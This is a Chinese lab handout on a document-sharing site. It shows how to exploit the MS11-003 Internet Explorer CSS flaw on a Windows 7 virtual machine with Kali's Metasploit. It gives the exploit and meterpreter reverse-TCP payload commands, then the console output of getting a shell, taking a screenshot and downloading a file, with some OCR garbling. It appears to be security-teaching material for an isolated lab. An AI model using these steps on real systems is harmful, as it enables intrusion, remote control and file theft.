欢迎来到淘文阁 - 分享文档赚钱的网站! | 帮助中心 好文档才是您的得力助手!
淘文阁 - 分享文档赚钱的网站
全部分类
  • 研究报告>
  • 管理文献>
  • 标准材料>
  • 技术资料>
  • 教育专区>
  • 应用文书>
  • 生活休闲>
  • 考试试题>
  • pptx模板>
  • 工商注册>
  • 期刊短文>
  • 图片设计>
  • ImageVerifierCode 换一换

    工业互联网安全测试技术:系统测试.docx

    • 资源ID:72736950       资源大小:277.88KB        全文页数:6页
    • 资源格式: DOCX        下载积分:15金币
    快捷下载 游客一键下载
    会员登录下载
    微信登录下载
    三方登录下载: 微信开放平台登录   QQ登录  
    二维码
    微信扫一扫登录
    下载资源需要15金币
    邮箱/手机:
    温馨提示:
    快捷下载时,用户名和密码都是您填写的邮箱或者手机号,方便查询和重复下载(系统自动生成)。
    如填写123,账号就是123,密码也是123。
    支付方式: 支付宝    微信支付   
    验证码:   换一换

     
    账号:
    密码:
    验证码:   换一换
      忘记密码?
        
    友情提示
    2、PDF文件下载后,可能会被浏览器默认打开,此种情况可以点击浏览器菜单,保存网页到桌面,就可以正常下载了。
    3、本站不支持迅雷下载,请使用电脑自带的IE浏览器,或者360浏览器、谷歌浏览器下载即可。
    4、本站资源下载后的文档和图纸-无水印,预览文档经过压缩,下载后原文更清晰。
    5、试题试卷类文档,如果标题没有明确说明有答案则都视为没有答案,请知晓。

    工业互联网安全测试技术:系统测试.docx

    系统2系统测试实验文档实验原理msll-003漏洞(Windows7IE溢出攻击)是利用IE浏览器中对css的解析存在一个问题, 导致任何访问包含非法css的页面将导致IE浏览器崩溃重启的漏,利用这个漏洞可以获取 Windows7计算机的控制台。实验目的通过kali linux里面集成的Metasploit渗透测试框架,利用msll-003漏洞,从而实现 对被入侵主机实施文件下载、控制命令窗口等攻击。实验环境Windows 7 系统Kali Linux 系统,推荐课时数:2课时实验步骤 首先翻开 kali 虚拟机和一台 windows? ie8,在 windows7查看 IP : 192,168.233,138, kali 查看 IP : C:Usersyan>ipconf igWindows IP 配置以太网适配器本地连接:珏道适配器 isatap. localdomainDNS后缀localdonain fe80:b80e:媒体已断开 localdonainAle Actions Edit View Help f(kalikali)-(-J J ifconfigethO: flagS-4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.233.130 netaask 255.255.255.0 broadcast 192.168.233.255 inet6 fe80 :20c:29f f:fe42:4d6 prefixlen 64 scopeid 0x2O<link> ether 00:0c:29:42:04:d6 txqueuelen 1000 (Ethernet) RX packets 174 bytes 19377 (18.9 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 23 bytes 2346 (2.2 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 010: HagS-73<UPrLOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 :1 prefixlen 128 scopeid 0»lO<host> loop txqueuelen 1000 (Local Loopback) RX packets 8 bytes 400 (400.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 8 bytes 400 (400.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0图1 IP地址(2)在kali虚拟机中ping该虚拟机,查看是否可以ping通。L$ ping PING 192.168.233.149 (192.168.233.149) 56(84) bytes of data.64bytesfrom:icmp_seq=lttl=128time=0.926ms64bytesfrom:icmp_seq=2ttl=128time=0.420ms64bytesfrom:icmp_seq=3ttl=128time=0.871ms64bytesfrom:icmp_seq=4ttl=128time=0.353ms64bytesfrom:icmp_seq=5ttl=128time=0.369ms图 2 kali ping win7(3) Metasploit框架(简称MSF)是一个开源工具,旨在方便渗透测试,它是由Ruby程序 语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发,使用定制的工具模 板。该工具有六个模块,分别为辅助模块(auxiliary)、渗透攻击模块(exploits)、后渗透攻击模 块(post)、攻击载荷模块(payloads)、空指令模块(nops)、编码器模块(encoders),其中msf为 总模块,其他均为分支模块。翻开msfconsole工具,命令行中输入search msll_003omsf6 > search msll_003Matching Modules# Name iption# Name iptionDisclosure Date Rank Check Descr0 exploit/windows/browser/msll_003_ie_css_import 2010-11-29 good No MS11- 003 Microsoft Internet Explorer CSS Recursive Import Use After FreeInteract with a module by name or index. For example info 0, use 0 or use exploit/windows /browser/msll 003 ie css import图3查看msll_003漏洞(4) 使用命令 use exploit/windows/browser/msll_003Je_css_importmsf6 > use exploit/windows/browser/msll_003_ie_css_importNo payload configured, defaulting to windows/meterpreter/reverse_tcp图4使用msll_003漏洞(5) show payloads 选择 windows/meterpreter/reverse_tcpmsf6 exploit() > show payloadsCompatible Payloads# NameDisclosure Date RankCheck Description0payload/generic/customnormal NoCustom Payload1 payload/generic/debug_trapnormal NoGeneric x86 Debug Trap2 payload/generic/shell_bind_tcpnormal No Generic Command Shell, Bind TCP Inline3 payload/generic/shell_reverse_tcpnormal No Generic Command Shell, Reverse TCP Inline4 payload/generic/tight_loopnormal No Generic x86 Tight Loop5 payload/windows/dllinject/bind_hidden_ipknock_tcpnormal No Reflective DLL Injection, Hidden Bind Ipknock TCP Stager6 payload/windows/dllinject/bind_hidden_tcpnormal No Reflective DLL Injection, Hidden Bind TCP Stager7 payload/windows/dllinject/bind_ipv6_tcpnormal No Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86)8 payload/windows/dllinject/bind_ipv6_tcp_uuidnorm al No Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86)图5查看payloads(6)输入如下的命令 set payloads windows/meterpreter/reverse_tcpmsf6 exploit() > set payload windows/meterpreter/reverse_tcp payload = windows/meterpreter/reverse_tcp msf6 exploit() > (7)msf6 exploit( srvhost n 192.168.233.130 msf6 exploit(msf6 exploit(8) show options查看配置情况msf6 exploit() > show optionsModule options (exploit/windows/browser/msll_003_ie_css_import):NameCurrent SettingRequiredDescriptionOBFUSCATEtruenoEnable JavaScript obfuscationSRVHOSTyesThe local host or network interface to listen on. This must be an address on the local machi ne or 0.0.0.0 to listen on all addresses.SRVPORT8080yesThe local port to listen on.SSLfalsenoNegotiate SSL for incoming connectionsSSLCertnoPath to a custom SSL certificate (default is r andomly generated)URIPATHnoThe URI to use for this exploit (default is ra ndom)Payload options (windows/meterpreter/reverse.tcp):NameCurrent SettingRequiredDescriptionEXITFUNCprocessyesExit technique (Accepted:seh, thread, process, none)LHOSTyesThe listen address (an interface may be specifi ed)LPORT4444yesThe listen portExploit target:Id Name0 Automatic图8查看配置情况(9) 设置 uripathset uripath +任意输入(例如00)msf6 exploit() > set uripath 00uripath = 00msf6 exploit() > ,图9(10)开始运行run/exploit,会出现一个URL将其复制下来,粘贴到windows7的ie浏览器 中msf6 exploit() >Started reverse TCP handler on 192.168.233.130:4444L* Using URL: :8080/00* Server started.图 10 URL(11)出现如下情况,那么连接成功Session has User level rights.* Will attempt to migrate to a User level process.Could not migrate to explorer.exe.- Attempting to spawn explorer.exe+ Successfully spawned explorer.exe* Trying explorer.exe (4516)* 192.168.233.138 msll_003_ie_css_import - Received request for "/00/generic-163885114 0.dll"* 192.168.233.138 msll_003_ie_css_import - Sending .NET DLL* + Successfully migrated to explorer.exe (4516) as: WIN-2CSC42S4EQLyan* Meterpreter session 1 opened (192.168.233.130:4444 T 192.168.233.138:51173) at 2021- AU c 本ccc图11sessions查看会话sessionsActive sessionsId Name TypeInformationConnection1meterpreter x86/windows WIN-2CSC42S4EQLyan a) WI 192.168.233.130:4444 TN-2CSC42S4EQL192.168.233.138:51173 ( 1)2meterpreter x86/windows WIN-2CSC42S4EQLyan a) WI 192.168.233.130:4444 TN-2CSC42S4EQL192.168.233.138:51175 (1)图12(12) sessions +ID (例如 sessions 1) o选择sessions会话的时候可能会连接不成功,那么换一个sessions即可。连接成功后,使用shell命令可以进入win7计算机的控制台。msf6 exploit() > sessions 1* Starting interaction with 1 . meterpreter > shell Process 4092 created. Channel 1 created.Microsoft Windows 幽 6.1.7600(c) 2009 MicrosoftC:UsersyanDesktop>|图13进入控制台后输入calc可以翻开计算器,输入2.txt可以翻开该文件夹下的2,txtoC:UsersyanDesktop>calc calc翻开 calc.exeC:UsersyanDesktop>2.txt 2.txt翻开2.txt(14)输入 exit,会进入 meterpreter,输入 screenshot 会截取 win7 屏幕;download c:/2.txt 会下载c盘的文件2.txtJBXgZww.jpeg 800x600 32.3 kB 69.4% meterpreter > screenshotScreenshot saved to: /home/kali/JBXgZvvw.jpeg meterpreter >截屏2.txt.xsession- errors.old.XauthorityDevices File SystemNetworkD Browse Network16 folders, 27 files: 547.8 KiB (560,971 bytes), Free space: 63.1 GiBmeteroreter > download C:/2.txt* Downloading: C:/2.txt -» /home/kali/2.txt* Downloaded 142.00 B of 142.00 B (100.0%): C:/2.txt -> /home/kali/2.txtI* download : C:/2.txt t /home/kali/2.txtmeterpreter > |下载win7的文件

    注意事项

    本文(工业互联网安全测试技术:系统测试.docx)为本站会员(太**)主动上传,淘文阁 - 分享文档赚钱的网站仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知淘文阁 - 分享文档赚钱的网站(点击联系客服),我们立即给予删除!

    温馨提示:如果因为网速或其他原因下载失败请重新下载,重复下载不扣分。




    关于淘文阁 - 版权申诉 - 用户使用规则 - 积分规则 - 联系我们

    本站为文档C TO C交易模式,本站只提供存储空间、用户上传的文档直接被用户下载,本站只是中间服务平台,本站所有文档下载所得的收益归上传人(含作者)所有。本站仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。若文档所含内容侵犯了您的版权或隐私,请立即通知淘文阁网,我们立即给予删除!客服QQ:136780468 微信:18945177775 电话:18904686070

    工信部备案号:黑ICP备15003705号 © 2020-2023 www.taowenge.com 淘文阁 

    收起
    展开